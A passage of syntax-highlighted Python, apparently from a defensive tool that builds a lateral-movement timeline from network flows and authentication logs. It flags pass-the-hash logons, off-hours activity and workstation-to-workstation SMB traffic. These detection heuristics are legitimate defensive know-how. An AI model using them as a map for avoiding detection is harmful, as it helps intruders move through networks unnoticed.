35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'PASS_THE_HASH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Off-hours activity (midnight to 5am)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hour </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'OFF_HOURS'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                
</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Workstation-to-workstation SMB (no server name pattern)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'srv'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'server'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dc'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">lower</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'WORKSTATION_TO_WORKSTATION_SMB'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            event </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">:</span><span class=\"token plain\"> src_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> src_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> src_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> dst_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'protocol'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'TCP'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes_transferred'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" 
style=\"color:hsl(139, 66%, 32%)\">'bytes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'tcp_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'UNKNOWN'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> suspicion_flags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> suspicion_flags </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'INFO'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">print_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">,</span><span class=\"token plain\"> timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> high_only</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Print a readable attack timeline.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\\n\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">+</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"=\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">*</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">80</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"LATERAL MOVEMENT 
TIMELINE\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"=\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">*</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">80</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        port_names </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">445</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'SMB'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">135</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'RPC'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3389</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'RDP'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5985</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'WinRM'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">22</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'SSH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> event </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> high_only </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> event</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">!=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            port_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> port_names</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_port'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            mb </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">round</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'bytes_transferred'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1048576</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            flags_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">', '</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token 
plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_flags'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'none'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 
